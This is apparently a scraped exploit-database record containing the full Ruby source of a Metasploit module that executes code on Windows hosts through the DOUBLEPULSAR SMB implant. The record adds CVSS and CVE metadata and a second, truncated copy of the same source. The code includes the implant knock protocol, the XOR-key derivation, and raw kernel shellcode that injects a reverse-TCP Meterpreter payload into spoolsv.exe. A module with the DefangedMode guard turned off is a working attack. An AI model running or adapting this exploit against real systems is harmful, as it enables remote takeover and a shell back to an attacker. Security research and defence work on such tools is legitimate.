Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-01] #"}, "lastseen": "2021-09-30T22:14:19", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a7f14c2d4158f8362b582a31323f2628", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T22:16:45", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", 
"1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
